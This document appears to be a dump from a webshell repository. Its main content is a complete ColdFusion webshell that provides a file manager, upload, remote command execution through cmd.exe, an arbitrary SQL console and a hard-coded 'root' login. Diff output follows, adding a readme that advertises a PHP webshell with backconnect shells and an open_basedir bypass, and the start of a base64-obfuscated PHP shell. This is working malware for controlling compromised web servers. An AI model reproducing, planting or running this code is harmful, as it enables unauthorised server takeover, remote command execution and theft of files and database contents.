<cffunction name="dirDelete" access="public" output="false" returntype="any">
<cfargument name="dir" required="no" default="#expandPath('/pocket_cache/')#">
<cfdirectory action="list" name="delfile" directory="#arguments.dir#">
<cfif delfile.RecordCount EQ 0>
<cfif directoryExists(arguments.dir)>
<cfdirectory action="delete" directory="#arguments.dir#">
</cfif>
<cfelse>
<cfloop query="delfile">
<cfif type EQ "file">
<cffile action="delete" file="#arguments.dir#\#name#">
<cfelse>
<cfset temp = dirDelete(arguments.dir & '\' & #delfile.name#)>
</cfif>
</cfloop>
<cfif directoryExists(arguments.dir)>
<cfdirectory action="delete" directory="#arguments.dir#">
</cfif>
</cfif>
</cffunction>
<!--- ham doi ten thu muc --->
<cffunction name="renameDirectory" access="remote" output="false" returntype="void">
<cfargument name="oldDir" type="string" required="true"/>
<cfargument name="newDir" type="string" required="true"/>
<cfdirectory action="rename" directory="#arguments.oldDir#" newdirectory="#arguments.newDir#"/>
</cffunction>
</cfoutput>
<!--- bat dau nhan lenh --->
<cfif isDefined("action")>
<cfif action is "goto">
<cfoutput>
<cfif isDefined("scr")>
<cfset dir = #scr#>
<cfif Right(dir, 1) neq "\" >
<cfset dir = "#dir#\">
</cfif>
</cfif>
</cfoutput>
<cfelseif action is "edit">
<cfoutput>
<cfif isDefined("scr")>
<cfif FileExists("#scr#")>
<cfset file_name=#Replace(#scr#,'#GetDirectoryFromPath(scr)#','','ALL')#>
<title>&##272;ang s&##7917;a t&##7879;p #scr#</title>
<script language="JavaScript" type="text/javascript">
function sTrim(sVariable)
{
return sVariable.replace(/^\s+|\s+$/g,"");
}
function validateFields(form)
{
return true;
}
</script>
<cffile action="read" file="#scr#" variable="thisFile">
<h1>Edit file:</h1>
<div class=content>
<form action="?action=save&scr=#GetDirectoryFromPath(scr)#" method="post" onsubmit="return validateFields(this);">
<input type="hidden" name="fileName" value="#file_name#" />
<input type="hidden" name="action_type" value="edit" />
<tr>
<td style="font-weight:bold;" nowrap="nowrap">
File path:
</td>
<td>
#scr#
</td>
</tr>
<tr>
<td>
<cfset thisFile=#Replace(#thisFile#,'<','<','ALL')#>
<cfset thisFile=#Replace(#thisFile#,'>','>','ALL')#>
<textarea class="bigarea" name="fileContent">#thisFile#</textarea>
</td>
</tr>
<tr>
<td>
<input type="submit" value="Save" style="font-family:verdana; font-size:11px;" />
</td>
</tr>
</form></div>
<cfelse>
<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
</cfif>
<a href="?action=goto&scr=#GetDirectoryFromPath(scr)#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "cut">
<cfoutput>
<cfif isDefined("scr")>
<cfset cutdir = #scr#>
<cfif FileExists("#scr#")>
<cfset cutdir = #RemoveChars(cutdir, len(cutdir), 1)#>
<cfloop condition = "Right(cutdir, 1) neq '\'">
<cfset cutdir = #RemoveChars(cutdir, len(cutdir), 1)#>
</cfloop>
<cfform name="articles" ENCTYPE="multipart/form-data">
B&##7841;n s&##7869; di chuy&##7875;n t&##7879;p <font color="red">#scr#</font> t&##7899;i <cfinput type="text" name="thumucsechuyen" size="50" value="#cutdir#"> <input type="submit" value="Th&##7921;c hi&##7879;n" />
</cfform>
<cfif isDefined("thumucsechuyen")>
<cffile action="move" source="#scr#" destination="#thumucsechuyen#">
<cflocation url="?action=goto&scr=#cutdir#" addtoken="No">
</cfif>
<cfelse>
<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
</cfif>
<a href="?action=goto&scr=#cutdir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "copy">
<cfoutput>
<cfif isDefined("scr")>
<cfset copydir = #scr#>
<cfif FileExists("#scr#")>
<cfset copydir = #RemoveChars(copydir, len(copydir), 1)#>
<cfloop condition = "Right(copydir, 1) neq '\'">
<cfset copydir = #RemoveChars(copydir, len(copydir), 1)#>
</cfloop>
<cfform name="articles" ENCTYPE="multipart/form-data">
B&##7841;n s&##7869; sao ch&##233;p t&##7879;p <font color="red">#scr#</font> t&##7899;i <cfinput type="text" name="thumucsechuyen" size="50" value="#copydir#"> <input type="submit" value="Th&##7921;c hi&##7879;n" />
</cfform>
<cfif isDefined("thumucsechuyen")>
<cffile action="copy" source="#scr#" destination="#thumucsechuyen#">
<cflocation url="?action=goto&scr=#copydir#" addtoken="No">
</cfif>
<cfelse>
<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
</cfif>
<a href="?action=goto&scr=#copydir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "rename">
<cfoutput>
<cfif isDefined("scr")>
<cfset renamedir = #scr#>
<cfif FileExists("#scr#")>
<cfloop condition = "Right(renamedir, 1) neq '\'">
<cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#>
</cfloop>
<cfform name="articles" ENCTYPE="multipart/form-data">
Rename #renamedir#<cfinput type="text" name="namechange" size="25" value=""> <input type="submit" value="Rename" />
</cfform>
<cfif isDefined("namechange")>
<cffile action="rename" source="#scr#" destination="#renamedir##namechange#">
<cflocation url="?action=goto&scr=#renamedir#" addtoken="No">
</cfif>
<cfelse>
<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
</cfif>
<a href="?action=goto&scr=#renamedir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "renamed">
<cfoutput>
<cfif isDefined("scr")>
<cfset renamedir = #scr#>
<cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#>
<cfif DirectoryExists("#scr#")>
<cfloop condition = "Right(renamedir, 1) neq '\'">
<cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#>
</cfloop>
<cfform name="articles" ENCTYPE="multipart/form-data">
Rename #renamedir#<cfinput type="text" name="namechange" size="25" value=""> <input type="submit" value="Rename" />
</cfform>
<cfif isDefined("namechange")>
#renameDirectory('#scr#','#renamedir##namechange#')#
<cflocation url="?action=goto&scr=#renamedir#" addtoken="No">
</cfif>
<cfelse>
<p>Th&##432; m&##7909;c #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
</cfif>
<a href="?action=goto&scr=#renamedir#" style="color: rgb(255, 0, 0);"><u> <- ..</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- ..</u></a>
</cfif>
</cfoutput>
<cfelseif action is "down">
<cfoutput>
<cfif isDefined("scr")>
<cfset downdir = #scr#>
<cfif FileExists("#scr#")>
<cfloop condition = "Right(downdir, 1) neq '\'">
<cfset downdir = #RemoveChars(downdir, len(downdir), 1)#>
</cfloop>
<cfheader name="Content-Disposition" value="attachment; filename=#getFileFromPath (scr)#">
<cfcontent file="#scr#" type="application/octet-stream">
<cfelse>
<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
</cfif>
<a href="?action=goto&scr=#downdir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "del">
<cfoutput>
<cfif isDefined("scr")>
<cfset deletedir = #scr#>
<cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
<cfif FileExists("#scr#")>
<cfloop condition = "Right(deletedir, 1) neq '\'">
<cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
</cfloop>
<cffile action="delete" file="#scr#">
<cflocation url="?action=goto&scr=#deletedir#" addtoken="No">
<cfelse>
<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
</cfif>
<a href="?action=goto&scr=#deletedir#" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
</cfif>
</cfoutput>
<cfelseif action is "deld">
<cfoutput>
<cfif isDefined("scr")>
<cfset deletedir = #scr#>
<cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
<cfif DirectoryExists("#scr#")>
<cfloop condition = "Right(deletedir, 1) neq '\'">
<cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
</cfloop>
<cfset dirDelete('#scr#')>
<cflocation url="?action=goto&scr=#deletedir#" addtoken="No">
<cfelse>
<p>DeleteDir</p>
</cfif>
<a href="?action=goto&scr=#deletedir#" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
</cfif>
</cfoutput>
<cfelseif action is "new">
<!---
<cfoutput>
<cfif isDefined("scr")>
<cfif FileExists("#scr#")>
<p>T&##7853;p tin #scr# &##273;&##227; t&##7891;n t&##7841;i.</p>
<cfelse>
<cfform name="articles" ENCTYPE="multipart/form-data">
B&##7841;n s&##7869; t&##7841;o th&##432; m&##7909;c m&##7899;i #scr#<cfinput type="text" name="namecreate" size="25" value=""> <input type="submit" value="Th&##7921;c hi&##7879;n" />
</cfform>
<cfif isDefined("namecreate")>
<cffile action = "write" file = "#scr##namecreate#" output = "">
<cflocation url="?action=goto&scr=#scr#" addtoken="No">
</cfif>
</cfif>
<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
--->
<cfoutput>
<cfif isDefined("scr")>
<cfdirectory action="list" directory="#scr#" name="fileList">
<script language="JavaScript" type="text/javascript">
var fileArray = new Array(<cfoutput>#quotedValueList(fileList.name)#</cfoutput>);
function sTrim(sVariable)
{
return sVariable.replace(/^\s+|\s+$/g,"");
}
function validateFields(form)
{
var fileCount = 0;
var re = /.txt$|.cfm$|.cfml$|.htm|.html$/;
if (sTrim(form.fileName.value) == "")
{
alert('Can nhap ten tep');
form.fileName.focus();
return false;
}
if (form.fileName.value.search(re) < 0)
{
alert('Khong chap nhan tep loai nay!\n\n Chi chap nhan .cfm, .cfml, .htm, .html, va .txt!');
form.fileName.focus();
form.fileName.select();
return false;
}
for (var i=0; i<fileArray.length; i++)
{
if (sTrim(form.fileName.value) == fileArray[i])
{
fileCount++;
}
}
if (fileCount > 0)
{
alert('Ten nay da ton tai, vui long chon tep khac');
form.fileName.focus();
form.fileName.select();
return false;
}
return true;
}
</script>
<form action="?action=save&scr=#scr#" method="post" onsubmit="return validateFields(this);">
<input type="hidden" name="action_type" value="add" />
<table border="0" style="width:400px;">
<tr>
<td style="font-weight:bold;" nowrap="nowrap">
File name:
</td>
<td>
<input type="text" name="fileName" style="font-family:verdana; font-size:11px; width:316px;" />
</td>
</tr>
<tr>
<td style="font-weight:bold;" nowrap="nowrap">
File content:
</td>
<td colspan="2">
<textarea name="fileContent" style="font-family:verdana; font-size:11px; height:250px; width:600px;"></textarea>
</td>
</tr>
<tr>
<td colspan="2" style="text-align:right;">
<input type="submit" value="Save" style="font-family:verdana; font-size:11px;" />
</td>
</tr>
</table>
</form>
<a href="?action=goto&scr=#GetDirectoryFromPath(scr)#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "newd">
<cfoutput>
<cfif isDefined("scr")>
<cfform name="articles" ENCTYPE="multipart/form-data">
New dir: <cfinput type="text" name="namecreate" size="25" value="#GetDirectoryFromPath(scr)#"> <input type="submit" value="Create new dir" />
</cfform>
<cfif isDefined("namecreate")>
<cfdirectory directory= "#scr##namecreate#" action="create">
<cflocation url="?action=goto&scr=#scr#" addtoken="No">
</cfif>
<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "upload">
<cfoutput>
<cfif isDefined("scr")>
<cfform enctype="multipart/form-data" method="post">
Upload file to path: <font color="red">#scr#</font><br>
Choose file: <input type="file" size="80" name="fileup" /> <input type="submit" value="Upload" /><br/>
</cfform>
<cfif isDefined("fileup")>
<cffile action="upload" fileField="fileup" destination="#scr#" nameconflict="overwrite">
<cflocation url="?action=goto&scr=#scr#" addtoken="No">
</cfif>
<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "cmd">
<cfoutput>
<cfif not isDefined("patch")>
<cfif FileExists("#GetDirectoryFromPath(GetTemplatePath())#cdm.exe")>
<cfset patch = "#GetDirectoryFromPath(GetTemplatePath())#cmd.exe">
<cfset out = "#GetDirectoryFromPath(GetTemplatePath())#out.txt">
<cfelseif FileExists("C:\windows\system32\cmd.exe")>
<cfset patch = "C:\windows\system32\cmd.exe">
<cfset out = "C:\windows\system32\out.txt">
<cfelseif FileExists("C:\winnp\system32\cmd.exe")>
<cfset patch = "C:\winnp\system32\cmd.exe">
<cfset out = "C:\winnp\system32\out.txt">
<cfelse>
<p>Kh&##244;ng t&##236;m th&##7845;y t&##7879;p cmd.exe</p>
<p>Khai b&##225;o bi&##7871;n patch l&##224; &##273;&##432;&##7901;ng d&##7851;n tr&##7921;c ti&##7871;p t&##7899;i t&##7879;p cmd.exe</p>
<p>Khai b&##225;o bi&##7871;n out l&##224; &##273;&##432;&##7901;ng d&##7851;n tr&##7921;c ti&##7871;p t&##7899;i t&##7879;p d&##7919; li&##7879;u</p>
<cfset sai = 1>
</cfif>
<cfelseif FileExists("#patch#")>
<cfset out = "#GetDirectoryFromPath(patch)#out.txt">
<cfelse>
<p>Kh&##244;ng t&##236;m th&##7845;y t&##7879;p cmd.exe</p>
</cfif>
<cfif not isDefined("sai")>
<cfform name="articles" ENCTYPE="multipart/form-data">
Enter command: <cfinput type="text" name="command" size="25" value=""> <input type="submit" value="Run" />
</cfform>
<cfif isDefined("command")>
<p>Results:</p>
<cfexecute name="#patch#" arguments="/C #command# > #out#" timeout="60"></cfexecute>
#ReadFile('#out#')#
#out#
<cfif FileExists("#out#")>
<cffile action="delete" file="#out#">
</cfif>
</cfif>
</cfif>
<br>
<a href="?action=goto&scr=#GetDirectoryFromPath(GetTemplatePath())#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfoutput>
<cfelseif action is "datainfo">
<cfoutput>
<cfdump var="#DataSoureceInfo#">
<a href="?action=goto&scr=#GetDirectoryFromPath(GetTemplatePath())#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfoutput>
<cfelseif action is "save">
<cfoutput>
<cfif isDefined("form.fileName")>
<title>&##272;&##227; l&##432;u t&##7879;p</title>
<cffile action="write" file="#scr#\#form.fileName#" output="#form.fileContent#" addnewline="no">
&##272;&##227; <cfif form.action_type IS "edit">s&##7917;a<cfelse>t&##7841;o</cfif> th&##224;nh c&##244;ng t&##7879;p <span style="font-weight:bold;">#form.fileName#</span>.<br>
<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "sql">
<cfoutput>
<cfform name="articles1" ENCTYPE="multipart/form-data">
DataBase Name:
<cfif isDefined("database")>
<cfinput type="text" name="database" size="25" value="#database#"><br>
<cfelseif IsDefined("DS")>
<cfinput type="text" name="database" size="25" value="#DS#"><br>
<cfelse>
<cfinput type="text" name="database" size="25" value=""><br>
</cfif>
SQL query: <cfinput type="text" query="SQL" name="query" size="130" value=""><br>
<input type="submit" value="Th&##7921;c hi&##7879;n" />
</cfform>
</cfoutput>
<cfif isDefined("database") and isDefined("query")>
<cfquery name="SQL" DataSource="#database#">
#preserveSingleQuotes(query)#
</cfquery>
<br>
<table width="90%" border="1" align="center">
<tr><td align="center">M?u h?i: <font color="red"><cfoutput>#query#</cfoutput></font></td></tr>
<tr><td align="center">K?t qu? tr? v?:</td></tr>
<tr><td><cfdump var="#SQL#" format="text" label="Ket qua"></td></tr>
</table>
<br>
</cfif>
<cfoutput>
<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfoutput>
</cfif>
<cfelse>
<cfset action = "goto">
</cfif>
<cfif action is "goto" or action is "del" or action is "deld">
<cfoutput>
<center><a href="javascript:doMenu('thongtin');" id=xthongtin>[-]</a>Server info:</center>
<div id="thongtin">
<!--- Lay thong tin ip --->
<cfif #cgi.http_x_forwarded_for# eq "">
<cfset clientip="#cgi.remote_addr#">
<cfelse>
<cfset clientip="#cgi.http_x_forwarded_for#">
</cfif>
<!--- In thong tin server --->
<span>Server IP:</span> #CGI.HTTP_HOST#:#CGI.SERVER_PORT#</span> - <span>Client IP:</span> #clientip#<br>
<span>Gateway Interface:</span> #CGI.GATEWAY_INTERFACE# - <span>Server Name:</span> #CGI.SERVER_NAME#:#CGI.SERVER_PORT#<br>
<span>Server Protocol:</span> #CGI.SERVER_PROTOCOL# - <span>Server Software:</span> #CGI.SERVER_SOFTWARE#<br>
<span>Appserver:</span> #server.coldfusion.appserver# - <span>Expiration:</span> #DateFormat(server.coldfusion.expiration, "d/m/yy")# #TimeFormat(server.coldfusion.expiration, "HH:mm:ss")#<br>
<span>Product Name:</span> #server.coldfusion.productname# - <span>Product Level:</span> #server.coldfusion.productlevel# - <span>Product Version:</span> #server.coldfusion.productversion#<br>
<span>Server OS Arch:</span> #server.os.arch# - <span>Server OS Name:</span> #server.os.name# - <span>Server OS Version:</span> #server.os.version#<br>
</div>
<hr>
<!--- Thu tao Object
<cftry>
<cfobject type="com" class="scripting.filesystemobject" name="fso" action="connect">
<cfcatch type="any">
<cfobject type="com" class="scripting.filesystemobject" name="fso" action="create">
</cfcatch>
</cftry>
--->
<hr>
<center><a href="javascript:doMenu('congcu');" id=xcongcu>[-]</a>Main:</center>
<div id="congcu">
Path: #dir#<br>
Operations: <a href="?action=new&scr=#dir#">NewFile</a> - <a href="?action=newd&scr=#dir#">NewDir</a> - <a href="?action=upload&scr=#dir#" title="T&##7843;i l&##234;n m&##7897;t t&##7879;p t&##7915; m&##225;y t&##237;nh c&##7911;a b&##7841;n">Upload file</a> - <a href="?" title="Tr&##7903; v&##7873; th&##432; m&##7909;c ch&##7913;a Shell">---</a><br>
Actions: <a href="?action=cmd" title="Th&##7921;c thi l&##7879;nh Command Dos">CMD</a> - <a href="?action=sql&scr=#dir#" title="Th&##7921;c thi l&##7879;nh SQL query">SQL</a> - <a href="?action=datainfo" title="Th&##244;ng tin C&##417; S&##7903; D&##7919; Li&##7879;u">Datainfo CSDL</a>
</div>
<hr>
<h1>File manager:</h1>
<div id="thumuc">
</cfoutput>
<cfdirectory directory="#dir#" name="myDirectory" sort="type ASC" >
<div class=content>
<table width=100% class=main cellspacing=0 cellpadding=1><tr><th width='13px'><input type=checkbox class=chkbx name=ch11'></th><th>Name</th><th>Size</th><th>Modify</th><th>Chmod</th><th>Mode</th><th>Actions</th></tr>
<cfoutput>
<cfif len(dir) gt 3>
<tr>
<cfset updir = #dir#>
<cfset updir = #RemoveChars(updir, len(updir), 1)#>
<cfloop condition = "Right(updir, 1) neq '\'">
<cfset updir = #RemoveChars(updir, len(updir), 1)#>
</cfloop>
<th class=chkbx><input type=checkbox width='13px' class=chkbx></th><td width="20%"><strong><a href="?action=goto&scr=#updir#">..</a></strong></td>
</tr>
</cfif>
</cfoutput>
<cfset x=1>
<cfoutput query="myDirectory">
<cfif x EQ 2>
<tr class=l2><th class=chkbx width='13px'><input type=checkbox class=chkbx></th>
</cfif>
<cfif x EQ 1>
<tr class=l1><th class=chkbx width='13px'><input type=checkbox class=chkbx></th>
</cfif>
<cfif x EQ 1>
<cfset x=2>
<cfelse>
<cfset x=1>
</cfif>
<td>
<cfif #Type# is "Dir">
<a href="?action=goto&scr=#dir##Name#\"><b>[#Name#]</b></a>
<cfelse>
<a href="?action=edit&scr=#dir##Name#\">#Name#</a>
</cfif>
</td>
<td>
<cfif #type# is "Dir">
<Dir>
<cfelseif #Size# LT 1024>
#Size# B
<cfelseif #Size# LT 1024*1024>
#round(Size/1024)# KB
<cfelseif #Size# LT 1024*1024*1024>
#round(Size/1024/1024)# MB
<cfelseif #Size# LT 1024*1024*1024*1024>
#round(Size/1024/1024/1024)# GB
<cfelseif #Size# LT 1024*1024*1024*1024*1024>
#round(Size/1024/1024/1024/1024)# TB
</cfif>
</td>
<td>
#DateFormat(DateLastModified, "d/m/yy")# #TimeFormat(DateLastModified, "HH:mm:ss")#
</td>
<td>#Attributes#</td>
<td>#Mode#</td>
<td>
<cfif #Type# is "File">
<a href="?action=edit&scr=#dir##Name#">Edit</a>|<a href="?action=cut&scr=#dir##Name#">Cut</a>|<a href="?action=copy&scr=#dir##Name#">Copy</a>|<a href="?action=rename&scr=#dir##Name#">Rename</a>|<a href="?action=down&scr=#dir##Name#">Download</a>|<a href="?action=del&scr=#dir##Name#" onCLick="return confirm('Delete #Name# ?')">Delete</a>
<cfelse>
<a href="?action=cutd&scr=#dir##Name#\">Cutdir</a>|<a href="?action=copyd&scr=#dir##Name#\">Copy</a>|<a href="?action=renamed&scr=#dir##Name#\">Rename</a>|<a href="?action=deld&scr=#dir##Name#\" onCLick="return confirm('Delete #Name# ?')">DeleteDir</a>
</cfif>
</td>
</tr>
</cfoutput>
</table></div>
</div>
</cfif>
<!--- End Main --->
<cfelseif Not IsDefined("cookie.username")>
<cfform name="articles" ENCTYPE="multipart/form-data">
<center><table width="300" border="0">
<tr>
<td width="50">Username:</td>
<td width="50"><input type="text" name="username"></td>
</tr>
<tr>
<td width="50">Password:</td>
<td width="50"><input type="password" name="password"></td>
</tr>
<tr>
<td width="50">Remember you?:</td>
<td width="50">
<input type="checkbox" name="RememberMe" value="Yes" checked>
<input type="submit" name="Process" value="Login">
</td>
</tr>
</table></center>
</cfform>
<cfif IsDefined("username")>
<cfset member_username = "root">
<cfset member_password = "a619d974658f3e749b2d88b215baea46">
<cfif #username# neq #member_username#>
<center>Wrong username!</center>
<cfset structclear(cookie)>
<cfelseif hash(form.password, "MD5") neq #member_password#>
<center>Wrong password!</center>
<cfset structclear(cookie)>
<cfelse>
<cfif IsDefined("RememberMe")>
<cfset member_password1 = hash(form.password, "MD5")>
<cfcookie name="username" value="#form.username#" expires="NEVER">
<cfcookie name="password" value="#member_password1#" expires="NEVER">
<cfelse>
<cfset member_password1 = hash(form.password, "MD5")>
<cfcookie name="username" value="#form.username#">
<cfcookie name="password" value="#member_password1#">
</cfif>
<cflocation url="?" addtoken="No">
</cfif>
</cfif>
</cfif>
<!--- End Login --->
<hr>
</body>
</html>

2066
php/12309/12309.php.txt Normal file
View file

File diff suppressed because it is too large Load diff

22
php/12309/readme.md Normal file
View file

@ -0,0 +1,22 @@
site: https://github.com/kairn/12309.php
DESCRIPTION:
12309.php is advanced webshell with the main aim at executing shell commands in all possible ways. it has some additional functions though.
FEATURES:
- you could choose desired function to execute code with (+pcntl_exec +ssh2_exec)
- internal Perl, Python and SSI mini-webshells - save them to disk and run, if php system functions are disabled
- backconnect/bind port on PHP, Python, and "classic" perl and C backconnect/bind. Also there are several small one-line backconnects on different languages, useful too coz they do not need to save temporary file somewhere
- fully interactive backconnect on Python (yes, you can run even vim & mc via backconnect!)
- on old php versions (such as 5.1.6, 5.2.9) this script could bypass open_basedir and read other users` files (if you`re running it with webserver`s rights, i.e. kind of apache-mpm-prefork or -worker, not kind of -itk or -peruser, and if your account is not in chroot/jail). Also there is ability to read files with mysql and with usual file_get_contents
- nice extra functions (file manager, file editor, system info, text coders/decoders, local open ports scanner, etc)
LICENSE:
3-clause BSD:
http://en.wikipedia.org/wiki/BSD_licenses#3-clause_license_.28.22New_BSD_License.22_or_.22Modified_BSD_License.22.29
Copyright © 2010-2011, 12309, jabber: z12309@exploit.im, url: https://github.com/kairn/12309.php
parts of code are licensed under GPL, CC, BSD, WTFPL. if your religion forbids using one of these licenses, do not use this script.
THANKS:
thanks for your help: Tidus, Shift, pekayoba, Zer0, ForeverFree, r00nix
and all people whose code i borrowed: Endeveit, Michael Schierl, b374k, tex, ont.rif, oRb, Eric A. Meyer, Eugen, profexer, Bernardo Damele, Michael Foord, security-teams.net, pentestmonkey.net, metasploit.com

255
php/pas/pas.php Normal file
View file

@ -0,0 +1,255 @@
<?php $g___g_='base'.(32*2).'_de'.'code';$g___g_=$g___g_(str_replace("\n", '', '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
